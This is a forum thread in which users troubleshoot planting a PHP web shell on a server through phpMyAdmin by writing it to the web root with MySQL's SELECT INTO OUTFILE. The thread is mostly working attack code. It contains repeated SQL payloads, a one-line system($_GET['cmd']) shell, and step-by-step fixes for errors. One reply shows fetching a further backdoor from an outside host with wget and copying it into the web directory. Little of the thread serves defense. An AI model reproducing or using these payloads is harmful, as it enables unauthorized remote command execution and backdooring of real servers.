19 replies to this topic

[joske]

Well if i want to try out my PMA about security whit this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I have a CMD on help.php right?
BUT when i try to execute commands like ( dir c:\ or net stop "service") it returns IN the CMD box: ( dir c:\\ , net stop \ )

Please help me somebody i'm totally lost :s

[kuza55]

Well if i want to try out my PMA about security whit this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

I have a CMD on help.php right?
BUT when i try to execute commands like ( dir c:\ or net stop "service") it returns IN the CMD box: ( dir c:\\ , net stop \ )

Please help me somebody i'm totally lost :s

I'm not sure if this is the only thing wrong, but function names are case-sensitive, so Shell_Exec should be shell_exec.

And wouldn't it be easier to just dump a one line shell of

<?php system($_GET['cmd']); ?>

instead of something with a GUI......but yeah, if you replace Shell_Exec with shell_exec, it looks like it should work.....

[joske]

ok changed those things now:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

BUT looks like it's wrong :\

('<?php system($_GET['cmd']); ?>

when i run:

#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'cmd']); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].e' at line 1

but when i change to the right syntax:

use mysql;
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET["-cmd"]); ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print shell_exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/help.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

<?php system($_GET["-cmd"]); ?>

then it runs but when i go see @ help.php
there is a warning:

Warning: system() [function.system]: Cannot execute a blank command in C:\public_html\phpmyadmin\help.php on line 1

[SilentSky]

run it this way:
do it in mysql base

CREATE DATABASE tempdb;
use tempdb;
CREATE TABLE temptab (codetab text);

and then:

INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:\Website\MDEP\wwwroot\help.php' from temptab;
FLUSH LOGS

it´s very important that after the ; begins a new line.
if not, the code don´t work

[joske]

run it this way:
do it in mysql base

CREATE DATABASE tempdb;
use tempdb;
CREATE TABLE temptab (codetab text);

and then:

INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:\Website\MDEP\wwwroot\help.php' from temptab;
FLUSH LOGS

it´s very important that after the ; begins a new line.
if not, the code don´t work

now i got another error :s

Warning: Unexpected character in input: '\' (ASCII=92) state=1 in E:\XAMPP\xampp\phpMyAdmin\hepl.php on line 1

[SilentSky]

this directory exists as root directory in the php information?
E:\XAMPP\xampp\phpMyAdmin\

[joske]

this directory exists as root directory in the php information?
E:\XAMPP\xampp\phpMyAdmin\

yes

[w00zy]

I think kuza55's solution is the best:

1. create a php-file with the following code: <?php system($_GET['cmd']); ?>

2. save it as, lets say, shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

[joske]

I think kuza55's solution is the best:

1. create a php-file with the following code: <?php system($_GET['cmd']); ?>

2. save it as, lets say, shell.php

3. now you can execute commands by connecting to this file:

http://yourserver.com/shell.php?cmd=[command you want to execute]

so:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php system($_GET['cmd']); ?>');
SELECT * INTO OUTFILE 'C:/public_html/phpmyadmin/shell.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

right?

[joske]

hmmz i heard something about there is a new code with a uplaod button? :s

[Partizaan]

There are a lot of other php shells on the inet that work fine
with all the noob buttons u need

[joske]

There are a lot of other php shells on the inet that work fine
with all the noob buttons u need

yeah probarly but you can' find them :s

[PleXo]

hmmz i heard something about there is a new code with a uplaod button? :s

i have that, and the answer is no

its not new code, you can code it, you just need to know how

[roger_girardin]

the sql injection vulnerability allow you to simulate a drop command to a file and to inject your code in that file instead of the dropped data

so you don't need to inject all that code into your php file

<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>cmd.php</title></head><body bgcolor=#000000 text=#ffffff onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>" style="background:#000000;color:#ffffff;"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>

change it with

<? system($_REQUEST["cmd"];?>
or
<? system($_REQUEST["com"];?>

then your php file will execute the command you will put on the query string

eg :
if the injected code is <? system($_REQUEST["cmd"];?>
my_php_file?cmd=ls
or
if the injected code is <? system($_REQUEST["com"];?>
my_php_file?com=ls

then you will be able to upload a more sophisticated backdoor by something like :
my_php_file?com=wget:http://my_backdoor;cp /tmp/mybackdoor /var/www/mybackdoor;

rog

[joske]

Ok using this code:

use mysql;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<? $cmd = $_REQUEST["-cmd"]; ?><html><head><title>help.php</title></head><onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"><hr><pre><? if($cmd != "") print Shell_Exec($cmd); ?></pre></form></body></html>');
SELECT * INTO OUTFILE 'D:/Inetpub/wwwroot/phpmyadmin/help2.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;

i get this prob:

Notice: Undefined index: -cmd in D:\Inetpub\wwwroot\phpmyadmin\help2.php on line 1